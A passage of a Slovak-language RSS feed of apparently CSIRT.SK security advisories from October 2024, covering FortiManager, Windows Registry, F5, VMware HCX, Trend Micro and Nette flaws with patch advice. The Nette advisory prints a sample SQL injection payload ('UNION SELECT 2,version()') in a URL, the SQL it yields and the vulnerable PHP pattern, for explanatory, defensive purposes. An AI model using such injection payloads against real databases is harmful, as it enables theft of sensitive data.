<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF<span style="font-family:&quot;Calibri&quot;,sans-serif;mso-ascii-theme-font:minor-latin;
mso-hansi-theme-font:minor-latin;mso-bidi-theme-font:minor-latin;color:black;
font-weight:normal;mso-bidi-font-weight:bold"></span></a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-statcred-dFC8tXT5">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-statcred-dFC8tXT5</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1555/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Novú kritickú zraniteľnosť FortiManager aktívne zneužívajú na vykonávanie kódu</title>
		<link>/posts/1552</link>
					<comments>/posts/1552#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 24 Oct 2024 15:22:31 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[FortiManager]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1552</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Fortinet opravila kritickú aktívne zneužívanú zero-day zraniteľnosť v produkte FortiManager. CVE-2024-47575 spočíva v chýbajúcej autentifikácii pre prístup ku rozhraniu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Fortinet opravila kritickú aktívne zneužívanú zero-day zraniteľnosť v produkte FortiManager. CVE-2024-47575 spočíva v chýbajúcej autentifikácii pre prístup ku rozhraniu API, ktoré umožňuje vykonávanie príkazov, prístup k citlivým údajom a prevzatie kontroly nad FortiManager a v ňom spravovanými zariadeniami.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FortiManager 7.6.0</li>



<li>FortiManager 7.4.0 &#8211; 7.4.4</li>



<li>FortiManager 7.2 &#8211; 7.2.7</li>



<li>FortiManager 7.0 &#8211; 7.0.12</li>



<li>FortiManager 6.4 &#8211; 6.4.14</li>



<li>FortiManager 6.2 &#8211; 6.2.12</li>



<li>FortiManager Cloud 7.4.1 &#8211; 7.4.4</li>



<li>FortiManager Cloud 7.2.1 &#8211; 7.2.7</li>



<li>FortiManager Cloud 7.0.1 &#8211; 7.0.12</li>



<li>FortiManager Cloud 6.4 všetky verzie</li>
</ul>



<p><em>Staršie modely FortiAnalyzer 1000E, 1000F, 2000E, 3000E, 3000F, 3000G, 3500E, 3500F, 3500G, 3700F, 3700G, 3900E, pokiaľ majú povolené „config system global -> set fmg-status enable -> end“ a aspoň jedno rozhranie so službou fgfm.</em></p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-47575</strong> (CVSS skóre 9,8)</p>



<p>Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú aktívne zneužívanú zero-day zraniteľnosť v produkte FortiManager. CVE-2024-47575 spočíva v chýbajúcej implementácii mechanizmov autentifikácie bližšie nešpecifikovanej funkcionality API démona fgfmd. Vzdialený neautentifikovaný útočník ju zaslaním špeciálne vytvorených požiadaviek môže zneužiť na injekciu príkazov, vykonanie škodlivého kódu a získanie neoprávneného prístupu k citlivým údajom minimálne v rozsahu konfigurácie zariadenia, IP adries a prihlasovacích údajov k spravovaným zariadeniam. Útočník musí disponovať platným certifikátom ľubovoľného zariadenia Fortinet. To však nepredstavuje väčšiu prekážku.</p>



<p>Spoločnosť už od 13. októbra 2024 používateľov postupne varovala a poskytla aj odporúčania pre dočasnú mitigáciu zraniteľnosti. Podľa spoločnosti Mandiant je zraniteľnosť aktívne zneužívaná minimálne od júna 2024.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia aspoň na:</p>



<ul>
<li>FortiManager 7.6.1</li>



<li>FortiManager 7.4.5</li>



<li>FortiManager 7.2.8</li>



<li>FortiManager 7.0.13</li>



<li>FortiManager 6.4.15</li>



<li>FortiManager 6.2.13</li>



<li>FortiManager Cloud 7.4.5</li>



<li>FortiManager Cloud 7.2.8</li>



<li>FortiManager Cloud 7.0.13</li>
</ul>



<p>Ak aktualizácia nie je momentálne možná, <a href="https://www.fortiguard.com/psirt/FG-IR-24-423" data-type="link" data-id="https://www.fortiguard.com/psirt/FG-IR-24-423">výrobca odporúča</a> nastaviť kontrolu pristupujúcich zariadení niekoľkými spôsobmi v závislosti od Vašej zraniteľnej verzie FortiManager, pre verzie 7.0.12, 7.2.0-7.2.7, 7.4.0-7.4.4 a 7.6.0. Môžete tiež obmedziť prístup ku administratívnemu rozhraniu FortiManager z verejných IP adries.</p>



<p>Odporúčame tiež skontrolovať prítomnosť indikátorov kompromitácie, ktorých zoznam <a href="https://www.fortiguard.com/psirt/FG-IR-24-423" data-type="link" data-id="https://www.fortiguard.com/psirt/FG-IR-24-423">zverejnila Fortinet</a>, vo Vašich logoch.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.fortiguard.com/psirt/FG-IR-24-423">https://www.fortiguard.com/psirt/FG-IR-24-423</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-fortimanager-flaw-used-in-zero-day-attacks/">https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-fortimanager-flaw-used-in-zero-day-attacks/</a></li>



<li><a href="https://doublepulsar.com/burning-zero-days-fortijump-fortimanager-vulnerability-used-by-nation-state-in-espionage-via-msps-c79abec59773">https://doublepulsar.com/burning-zero-days-fortijump-fortimanager-vulnerability-used-by-nation-state-in-espionage-via-msps-c79abec59773<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575">https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1552/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Potenciálna zraniteľnosť pri používaní frameworku Nette umožňuje SQL injection</title>
		<link>/posts/1547</link>
					<comments>/posts/1547#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 24 Oct 2024 11:51:23 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Nette Framework]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1547</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/nette-logo-blue.png" alt="" /></p>Bezpečnostní analytici CSIRT.SK objavili potenciálnu zraniteľnosť vo webovom frameworku Nette, ktorá pri nesprávnom používaní Nette frameworku umožňuje vykonávať útoky typu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/nette-logo-blue.png" alt="" /></p>
<p><strong><strong>Bezpečnostní analytici CSIRT.SK objavili potenciálnu zraniteľnosť vo webovom frameworku Nette, ktorá pri nesprávnom používaní Nette frameworku umožňuje vykonávať útoky typu SQL injection.</strong></strong></p>



<p>Metóda <em>where($by)</em> v knižnici Database podporuje filtrovanie výsledkov databázovej požiadavky podľa poľa, v ktorom kľúče predstavujú názvy stĺpcov a hodnoty daných kľúčov predstavujú požadované hodnoty. Problematickými môžu byť kľúče párov premenných <em>{“kľúč“:“hodnota“}</em>.</p>



<p>V prípade, že sa do metódy <em>where</em> odošle PHP <em>array</em> v tvare <em>{“SQLi payload“=>“hodnota“}</em>, kde <strong><em>SQLi payload</em></strong> je hodnota zadaná používateľom, daný <strong>payload</strong> sa vykoná v databáze, čím je možné docieliť získavanie citlivých údajov. Príklad útoku:</p>



<p><code>:8000/?<strong>id%3d1)+UNION+SELECT+2,version()+FROM+test+WHERE+(1</strong>=1</code></p>



<p>Tým sa v&nbsp;Nette Framework vyskladá nasledovná databázová požiadavka:</p>



<p><code>“SELECT id, name FROM test (WHERE “. <strong>$column</strong> . ” = ?)” </code></p>



<p>Po doplnení hodnoty za premennú <em>column</em> dostaneme:</p>



<p><code>“SELECT id, name FROM test (WHERE “. “<strong>id=1) UNION SELECT 2,version() FROM test WHERE (1</strong>” . ” = ?)”</code></p>



<p>A teda finálna parametrizovaná požiadavka na databázu bude vyzerať:</p>



<p><code>“SELECT id, name FROM test (WHERE <strong>id=1) UNION SELECT 2,version() FROM test WHERE (1</strong>= ?)”</code></p>



<p>Zraniteľnosť vo webovej aplikácii môže nastať, pokiaľ programátor využíva knižnicu Nette/Database a ak je v Presenteri použitý kód:</p>



<p><code>$httpRequest = $this-&gt;getHttpRequest();</code><br><code>$filter = $httpRequest-&gt;getQuery();</code><br><code>$this-&gt;template-&gt;terms = $this-&gt;testFacade-&gt;<strong>findBy($filter)</strong>;</code></p>



<p>Zároveň Facade používa metódu <em>findBy</em> definovanú nasledovne (preberá hodnotu z&nbsp;funkcie <em>where</em>):</p>



<p><code>public function <strong>findBy(array $by)</strong>&nbsp; {</code><br>&nbsp;&nbsp;&nbsp; <code>return $this-&gt;database-&gt;table($this-&gt;tableName)-&gt;<strong>where($by)</strong>;</code><br>&nbsp;<code> }</code></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Pokiaľ pri vývoji webovej aplikácie v Nette Framework implementujete danú zraniteľnú funkcionalitu, odporúčame ošetriť používateľské vstupy (resp. kľúč premennej) podľa programátorom zadaného poľa povolených  názvov stĺpcov v rámci best practice bezpečného vývoja.</p>



<p>Pre viac informácií môžete kontaktovať CSIRT.SK.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1547/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Závažná zraniteľnosť Windows Registry</title>
		<link>/posts/1545</link>
					<comments>/posts/1545#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 22 Oct 2024 14:30:47 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[Registry]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">/?p=1545</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/Windows_10_konci_podpora-1.png" alt="" /></p>Microsoft opravil vysoko závažnú zraniteľnosť vo Windows Registry, ktorá umožňuje eskaláciu oprávnení na serveri na úroveň SYSTEM.[Aktualizácia 25.10.2024] Zraniteľné systémy:...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/Windows_10_konci_podpora-1.png" alt="" /></p>
<p><strong>Microsoft opravil vysoko závažnú zraniteľnosť vo Windows Registry, ktorá umožňuje eskaláciu oprávnení na serveri na úroveň SYSTEM.</strong><br><strong>[Aktualizácia 25.10.2024]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 11 version 21H2 for ARM64-based Systems</li>



<li>Windows 11 version 21H2 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems  Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 R2 for x64-based  Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based  Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-43532</strong> (CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť vo Windows Registry, ktorá umožňuje zvýšenie oprávnení na serveri na úroveň SYSTEM. Zraniteľnosť môže zneužiť útočník so sieťovým prístupom ku zraniteľnému zariadeniu tak, že vykoná špeciálne vytvorený skript, ktorý následne vykoná volanie RPC na RPC hostiteľa.</p>



<p>V súčasnosti je dostupný kód pre demonštráciu zneužitia tejto zraniteľnosti od spoločnosti Akamai.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia oprávnení</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná inštalácia príslušných balíkov opravných aktualizácií podľa <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43532" data-type="link" data-id="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43532">zoznamu Microsoft</a>. Zraniteľnosť bola opravené v rámci októbrového balíka Microsoft Patch Tuesday.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-43532">https://nvd.nist.gov/vuln/detail/CVE-2024-43532</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43532 ">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43532 </a></li>



<li><a href="https://www.akamai.com/blog/security-research/winreg-relay-vulnerability">https://www.akamai.com/blog/security-research/winreg-relay-vulnerability</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1545/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti F5 BIG-IP a BIG-IQ</title>
		<link>/posts/1540</link>
					<comments>/posts/1540#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 21 Oct 2024 13:39:17 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[BIG-IP]]></category>
		<category><![CDATA[BIG-IQ]]></category>
		<category><![CDATA[F5]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[XSS]]></category>
		<guid isPermaLink="false">/?p=1540</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/f5-1024x599.png" alt="" /></p>Spoločnosť F5 vydala bezpečnostné aktualizácie, ktoré opravujú 2 zraniteľnosti v F5 BIG-IP a F5 BIG-IQ. Vzdialený autentifikovaný útočník ich dokáže...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/f5-1024x599.png" alt="" /></p>
<p><strong>Spoločnosť F5 vydala bezpečnostné aktualizácie, ktoré opravujú 2 zraniteľnosti v F5 BIG-IP a F5 BIG-IQ. Vzdialený autentifikovaný útočník ich dokáže zneužiť na zvýšenie privilégií, vykonávanie kódu JavaScript a prevzatie kontroly nad zariadením.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>BIG-IP (všetky moduly) verzie 17.1.0 až 17.1.1</li>



<li>BIG-IP (všetky moduly) verzie 16.1.0 až 16.1.4</li>



<li>BIG-IP (všetky moduly) verzie 15.1.0 až 15.1.10</li>



<li>BIG-IQ verzie 8.2.0 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-45844 </strong>(CVSSv4 skóre 8,6)</p>



<p>Zraniteľnosť v monitorovacích funkciách BIG-IP umožňuje obchádzať kontrolu prístupov bez ohľadu na nastavenia uzamykania portov. Vzdialený autentifikovaný útočník s oprávneniami úrovne Manager a vyššie by ju mohol zneužiť na eskaláciu privilégií a úpravu konfigurácie zraniteľných systémov. Zneužitie zraniteľnosti vyžaduje prístup útočníka ku Configuration Utility alebo TMOS Shell.</p>



<p><strong>CVE-2024-47139</strong> (CVSSv4 skóre 4,8)</p>



<p>Zraniteľnosť v používateľskom rozhraní BIG-IQ by vzdialený autentifikovaný útočník s oprávneniami úrovne Administrator mohol zneužiť na ukladanie kódu JavaScript a HTML (útoky typu stored XSS) a jeho vykonanie v kontexte prihlásených používateľov. Ak má obeť prístup ku konzole Advanced Shell, môže útočník získať možnosť prevziať kontrolu nad zraniteľným zariadením.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia BIG-IP na verziu 17.1.1.4, 16.1.5 alebo 15.1.10.5 a BIG-IQ na 8.3.0 a 8.2.0.1.<br><br>Pokiaľ nie je možné zraniteľné zariadenie aktualizovať, dočasne <a href="https://my.f5.com/manage/s/article/K000140061" data-type="link" data-id="https://my.f5.com/manage/s/article/K000140061">mitigovať zraniteľnosť</a> CVE-2024-45844 môžete obmedzením prístupu ku Configuration Utility a TMOS Shell cez SSH len pre dôveryhodných používateľov/zariadenia a z dôveryhodných sietí.<br><br>Pre mitigáciu zraniteľnosti CVE-2024-45844 sa po práci vždy odhláste z používateľského rozhrania BIG-IQ a zatvorte prehliadač. Používajte odlišný prehliadač pre správu F5, ako pre prehliadanie internetu.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://my.f5.com/manage/s/article/K000140061">https://my.f5.com/manage/s/article/K000140061<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://my.f5.com/manage/s/article/K000141080">https://my.f5.com/manage/s/article/K000141080<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://asec.ahnlab.com/en/83971/">https://asec.ahnlab.com/en/83971/<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45844">https://nvd.nist.gov/vuln/detail/CVE-2024-45844<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47139">https://nvd.nist.gov/vuln/detail/CVE-2024-47139</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1540/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažná zraniteľnosť v produkte VMware HCX</title>
		<link>/posts/1535</link>
					<comments>/posts/1535#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 18 Oct 2024 14:02:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[HXC]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[VMware]]></category>
		<guid isPermaLink="false">/?p=1535</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v produkte VMware HCX. CVE-2024-38814 možno prostredníctvom SQL injekcie zneužiť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>
<p><strong>Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v produkte VMware HCX. CVE-2024-38814 možno prostredníctvom SQL injekcie zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>VMware HCX 4.10.X vo verziách starších ako 4.10.1</li>



<li>VMware HCX 4.9.X vo verziách starších ako 4.9.2</li>



<li>VMware HCX 4.8.X vo verziách starších ako 4.8.3</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-38814</strong> (CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť s označením CVE-2024-38814 spočíva v nedostatočnom overovaní používateľských vstupov a vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených SQL dopytov mohol zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany útočníka.<br>Zraniteľnosť odhalili bezpečnostní výskumníci zo spoločnosti Trend Micro Zero Day Initiative (ZDI).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a dostupnosti systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu VMware HCX na verziu 4.8.3, 4.9.2 alebo 4.10.1.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25019">https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25019</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/382510">https://exchange.xforce.ibmcloud.com/vulnerabilities/382510</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-38814">https://nvd.nist.gov/vuln/detail/CVE-2024-38814</a></li>



<li><a href="https://www.securityweek.com/vmware-patches-high-severity-sql-injection-flaw-in-hcx-platform/">https://www.securityweek.com/vmware-patches-high-severity-sql-injection-flaw-in-hcx-platform/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1535/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v produkte Trend Micro Cloud Edge</title>
		<link>/posts/1529</link>
					<comments>/posts/1529#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 18 Oct 2024 13:53:33 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cloud Edge]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Trend Micro]]></category>
		<guid isPermaLink="false">/?p=1529</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/trend-micro-logosvg.jpg" alt="" /></p>Spoločnosť Trend Micro vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte Cloud Edge. Zraniteľnosť o označením CVE-2024-48904 možno zneužiť na vzdialené...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/trend-micro-logosvg.jpg" alt="" /></p>
<p><strong>Spoločnosť Trend Micro vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte Cloud Edge. Zraniteľnosť o označením CVE-2024-48904 možno zneužiť na vzdialené vykonanie škodlivého kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Trend Micro Cloud Edge vo verzii 5.6SP2</li>



<li>Trend Micro Cloud Edge vo verzii 7.0</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-48904</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť s označením CVE-2024-48904 sa nachádza v implementácii REST API, ktoré štandardne počúva na TCP porte 8443 a spočíva v nedostatočnom overovaní používateľských vstupov používaných v rámci systémových volaní. Vzdialený neautentifikovaný útočník by ju prostredníctvom podvrhnutia špeciálne vytvorených príkazov mohol zneužiť na vzdialené vykonanie škodlivého kódu. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie 5.6 SP2 build 3228 alebo 7.0 build 1081.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://success.trendmicro.com/en-US/solution/KA-0017998">https://success.trendmicro.com/en-US/solution/KA-0017998</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-24-1418/">https://www.zerodayinitiative.com/advisories/ZDI-24-1418/</a></li>



<li><a href="https://cybersecuritynews.com/trend-micro-code-execution-vulnerability/">https://cybersecuritynews.com/trend-micro-code-execution-vulnerability/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1529/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – september 2024</title>
		<link>/posts/1483</link>
					<comments>/posts/1483#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 11 Oct 2024 12:47:26 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<guid isPermaLink="false">/?p=1483</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci september 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci september 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/10/MS2024-09.pdf" data-type="link" data-id="/wp-content/uploads/2024/10/MS2024-09.pdf">Mesačná správa – 09/2024 PDF (1 583 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas" data-type="link" data-id="https://localhost:9000/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas.html?csrt=16888374950890012865">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1483/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť GitLab umožňuje ľubovoľné spustenie CI/CD pipelinov</title>
		<link>/posts/1477</link>
					<comments>/posts/1477#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 11 Oct 2024 12:41:01 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[GitLab]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1477</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Gitlab-Logo-1024x577.png" alt="" /></p>Spoločnosť GitLab vydala aktualizáciu, ktorá opravuje osem zraniteľností. Najzávažnejšie umožňujú vzdialeným útočníkom spustiť CI/CD pipeline na ľubovoľnej vetve repozitára a...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Gitlab-Logo-1024x577.png" alt="" /></p>
